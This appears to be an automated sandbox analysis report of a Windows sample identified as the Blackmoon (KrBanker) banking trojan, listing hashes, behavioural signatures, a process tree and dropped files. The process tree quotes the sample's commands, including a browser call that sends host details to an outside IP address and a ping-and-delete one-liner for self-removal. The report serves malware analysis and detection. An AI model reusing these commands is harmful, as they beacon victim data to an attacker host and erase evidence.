Analysis

  • max time kernel
    133s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    25-12-2024 17:01

General

  • Target

    9f33cff08e3cd003014617ef7607b5e800ff2bb200b3490334e5d9eefb3a351a.exe

  • Size

    34KB

  • MD5

    e57f3af1e46055845b6f67820c584011

  • SHA1

    72fa64e73df5148dea2fb5b06c63e87f79ca4deb

  • SHA256

    9f33cff08e3cd003014617ef7607b5e800ff2bb200b3490334e5d9eefb3a351a

  • SHA512

    6fc310e83ad0aad281e93e3ca987f0dcb878d82db42f2995e9fad685ce2ec93f79a98bd7ed05b3d4da3ef00c4f35708a83aa04901e2d1c523ad818d1a96345d2

  • SSDEEP

    768:gxa4PfkczEClQF0QGqwq0E6Na8WFaDrTCMNR8Gx8IPE7BNKSzHctMlC:RQftW0QGq/aabWrTsGx3P6Cbt7

Malware Config

Signatures

  • Blackmoon family
  • Blackmoon, KrBanker

    Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.

  • Detect Blackmoon payload 1 IoCs
  • Deletes itself 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9f33cff08e3cd003014617ef7607b5e800ff2bb200b3490334e5d9eefb3a351a.exe
    "C:\Users\Admin\AppData\Local\Temp\9f33cff08e3cd003014617ef7607b5e800ff2bb200b3490334e5d9eefb3a351a.exe"
    1⤵
    • Adds Run key to start application
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1164
    • C:\Program Files\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://174.139.72.117/ad/get.asp?mac=ED34DC096D3065E8518D88C6618F25D8&os=Windows 7&avs=unknow&ps=NO.&ver=jack
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2660
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2660 CREDAT:275457 /prefetch:2
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2452
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping 127.0.0.1 -n 3&del "C:\Users\Admin\AppData\Local\Temp\9f33cff08e3cd003014617ef7607b5e800ff2bb200b3490334e5d9eefb3a351a.exe"
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:2620
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.1 -n 3
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:1004

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    11182d938a2b7a55a104aa2909dfe93c

    SHA1

    0705cdf4a6985cbbb130971ac2e2f6fb7e9e7495

    SHA256

    fc10519ade31f7fab7392ab2c12c725dc32d63cfdc5cdfc9fad9fa4eb9a16a3b

    SHA512

    da927eec23e06240a17037e97d3042409b81a14fddd04e8cc3a5a4ad7703f65c1bb2ab766f4bd6bcc1c9b476e3bab3df13c0ea502e660800a00474ee2f2bcf2f

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    c9c5d96da8eca059195ba93572bc07ff

    SHA1

    073b420674edd1a465e81a7ac9e9b9c551186615

    SHA256

    641aa59ea517f1faf5faecad97e53b4efb63cccece41b9239bfda7b5e0992193

    SHA512

    089f53765f68382942a7414fe538fa825e3c090ec020b991ec66b73637751948475fe24bcf9727cc04905e10773f147fcf387c62e184ce65588ed18698c3e330

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    29d8b5f9f22e94f7c4ecdd5469c4becd

    SHA1

    164c2bad1d5a7c7c5fb593044359ce1370cfaecf

    SHA256

    50ff5b4b33f682859cf66933e012be721b796c08499ab6bb83eca8005168f325

    SHA512

    64cf418b1124bf5f4e3d661b50fc17e360f2e665a5186b4880dc6e3f6604c8df77a8c897d9e7f7dc4350b3f5d90617701581035ffd3c5607d20eb69c128243d9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    44700d6c9b0a1a130fdf7d0437dc9c8e

    SHA1

    66c85c1ea5ce2b1365c4e387475f8ecbe5eaf15b

    SHA256

    b63fdc39fd7093f1c875906f1680bfc1a0cb1252d54766bca8930c9400487ed5

    SHA512

    f4b68b155c85a1dfacb99315d966c49c6a64729d8061caf487cb819b217cc627f12ce1b0b767049838f6e2d993274947683d03cfa30eacb9bd786822a1eb8e89

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    713664b3429fad2329a032132c0c942b

    SHA1

    62e836620c85b63161aaded16374b1891aa35792

    SHA256

    37943fdf49567ad43276f4b6459547a529aeae6f7d1f745e7f57ec40d807c301

    SHA512

    fa7db3f7990a168abdb74bfd95f782ca940a0d4000b588c428460547858c398f4468af60102265ff7c962868333cb29a3d4bde833ce887708f8e98778b07de37

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    901f96ef54fb76c5ee941c3fe5be02b8

    SHA1

    1789448c0055fa91dd479aa1acd97998096525e7

    SHA256

    00256d9e97ca6fc735ce1f9d26038e10e13298da7fbaf0cad4ba8345905ab056

    SHA512

    6c6ce4205fcaf1cb6bb2b20fcdcc4785f4c6da021b4487deaeb243e684364d4069736b372d81d2ec09f1b717daf330366a81aba895b360db976d7f7936e0840e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    538ca5f5f61f2d5661b287ceebd52aff

    SHA1

    6662487b57837d1105d4bd5fd98f78742cde5737

    SHA256

    d8e5f27cabe9e6833e355e99b66a151c0a6e161d9a9ffc7ee24161c602faeec0

    SHA512

    489ae7b567b7622f0136c16617d253fa14ba520391b7c8bd1bc88143aadd29d207362a3a4efe1834d1faece306673f28663f85b742493129905dc2da0dc54005

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    f0e04e53989ac5c32c5cd5bb529a3df0

    SHA1

    5bf90a3147621a6003c104758f45a21bb347ab48

    SHA256

    1f2bc7c5ccbdf6d07648800ff4855bbd2171108520cd674aea2f0c984be624e6

    SHA512

    25d86a63d66569d719df6786cfecc3067cdf20269bf8de4df879fae6731d158a0b13bc637f31aa1ee819b218d2d21cc1f9783e1fc55908e5b3dd2ba0f9e6fb61

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    cc867d067542e926c46100f62d487941

    SHA1

    543b0aa7f022df79357d249a843a243318c54e45

    SHA256

    c21ebfe4578471274e8340582750c0a2eaeba93bf736fc9bc6510eecc2c1e40b

    SHA512

    3698f21d2da712b21acf77ecff2f39b0248fa661cd7a3b24d3641bc0ab41b79d5eafc10db025288ea815e890baa3ca5fde4c66b4e6047196851f320e5fda64b7

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    076941b86d93dde89aa3910de1e1479b

    SHA1

    b0dd03d7f7070001b15b26f8a59f1dd30227fd54

    SHA256

    85e7ee873aefc68f0d768204ac22b177d71e5ffe02db7643c0c4918e98fb513e

    SHA512

    a2ef3dcce658aaa813a43aaa27628cfa4155cca6207f6702e5bd5ad6e6aa061bbba40020cb7b10709dd4dccc804e5196a314c29abdb441f714f665407d9a92de

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    d7e8e36c5c50830d0a786f7d1b2d7696

    SHA1

    44a7ee75d55fc43a91fec643573f5e77900deca3

    SHA256

    9e5dab23c0ff0581cca675aedbd72b609c78bdb48dea7c7e20f078ef81f13f69

    SHA512

    707cb268e288575ff91123a9b84dd316463ffc16e87b237e103c9b84ce0fe34f561b0e5dae5f25975fefb6ea1b6e58861b58f8d81a142f605e7b5ee68789f4ff

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    8c04ec07c4167011fbd7c656686ceab6

    SHA1

    c226b9fc57e1bf73688438b74665c6f010621516

    SHA256

    5a73215672a8e3e540d25294c2967f8cb11a69b7a81b36f6fcddc4992fb2fae5

    SHA512

    20278d1f3163d0a4f53bb0690dbe5060ce585fae16fc24f04fa68ff7863422f6b36c88bc4b4cd90c14d7921891853430e6b49c210142f432b7aaab8ab0ac745f

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    29b20ce7407b1b4b540dd6ea1fca45fc

    SHA1

    65ac76766060251f51f634bc189a3d7047b40784

    SHA256

    5f38acc99630034e8e30aaaa7340ec0278279ad8b7e8452cbf4d78c74e0e0ddc

    SHA512

    79955e53e818d59b636ec63d9cf1914a7b950d5710ff662aa6b170f4dcfb8f06d858daddf994a290850c18864ae73b56dae24d9defa36367368233ad1171d3d6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    d67279234ec3511aa42799e684334c2a

    SHA1

    085de621751d773ecf946676f7d2e0117b3ed3df

    SHA256

    8010deeccbb17524ed5e1abab8118e2cb4de255d5f2a4c2de1f5598d5cb274f5

    SHA512

    eb9120114679b6937855072086d01010f8522e23e77274d4a517698f8ceeef7db8b273e7ba89358a781e3c4a5b9ee87efb87e64f5f79e85e187f9764ab9800be

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    e0b4190174349cc19c08772744975c2a

    SHA1

    d8187479a18221db95efa0d31ef51056f5eb4701

    SHA256

    5ab4ff70e5da6326f73e4bac7dca87260cb4f72cf958dd0d89de2cf2d352f744

    SHA512

    dff9cfb9030fdea438dc3dcbd57daf0b694342d067a73c62eee1db340f93a066ce66fdd522ba7dfee705e2ac231fb709c6a783efd0d22a9dcdd5eb316fc01e8e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    95cfc8242e0776ab32622f3813ea3606

    SHA1

    5bb4d7c459d6e810f5dc183555c52551e553fd33

    SHA256

    1cce61cb6bb1a6073fbce12fda8d6c7ba072e3972811e2c6db609ccee5478b6e

    SHA512

    117c3115bd3ec1e66e30110567448fa420be561981863387a4dbb17d9fbb6e231268c93b9a65f32392c0b11d701229de6640a782cff2b106bbd9f81b8a918bec

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    2d2e1be9c63b664c5f4d4e0edca37223

    SHA1

    2e4be7b9d133a2f681e51df3891e777e6ebd19f0

    SHA256

    e256adf969f8b116e63bc1e1f2f84fe63143fc72331c62c3148e7a9baac84c22

    SHA512

    d0e58e7f2cd0c5a50b2679a924aa98135d32ae5cdccef09b72c4e1ff2dc78dc80387f89a520b49f93e5228fbd312895779d0e1873f1d093e1f55b415df83f5e7

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    ed58425c4598742bb1243a4247ca7573

    SHA1

    bf52b3e5c32575209f938ebe3ad3776f5729a7c4

    SHA256

    0037fbb3259c93f083ab9d23b103b30aef39e2917b618ced127028eb70d39e83

    SHA512

    3223d93cb46e8c554b86d513ae95e6b2b76319d9726247605693a12b802994f03a38266b14543ef34a9afbfb73fb984bb9ed49a03b063945282aa597151446d5

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    ebb6b61250a690f51f6645f77f073c4b

    SHA1

    b06aeec79bb357b7d9ec4ac39dc54faf107aea59

    SHA256

    e4f54ca1133d5b981e104cdf9aa459763c15c5bf06adc474c562ab6b25398dd7

    SHA512

    5064d679ed0ed970c7039255055927b3815442e75e9468e842020264ebd6b45df39f1cc4765f2088fe4ee816e339447d58f38cb98779d33cde98d182319a0f11

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    e34a00ffce4c68ba3cef2e0722581ab7

    SHA1

    8179b29d6626eedc8ffaee9ba53007afbac95b9c

    SHA256

    b1481cab76b7985fa28df9cdfb96abc1af0c99e6de93758ac0a97602f24c87dc

    SHA512

    c2676eaabf08e2c414734c545541df7f53a07e3a26e740b9afa34d619d10b1d7f12481bd8406c040279d2faeef62d20e15da35c29d1a787e87d3138e28f1b25b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    e0f510d5efd6f895713d0a07c8af68ca

    SHA1

    1eae38089920204a6500d1d32f41eb45d8e455d7

    SHA256

    20e3263e7aef7e651aad1d40473e4beca5e74b49165694a1bd879df3ad6a9e6c

    SHA512

    cc2beddf9c538fd981b33a9d8908a2116c8f6cb2d011a62b6b814df724e7f5dd583095f107319433ff0393eee59ac9dca73f62b8ebac14cfda196cdc64c0b9ba

  • C:\Users\Admin\AppData\Local\Temp\Cab2914.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\Tar2977.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • memory/1164-2-0x0000000000400000-0x0000000000431200-memory.dmp

    Filesize

    196KB

  • memory/1164-0-0x0000000000400000-0x0000000000431200-memory.dmp

    Filesize

    196KB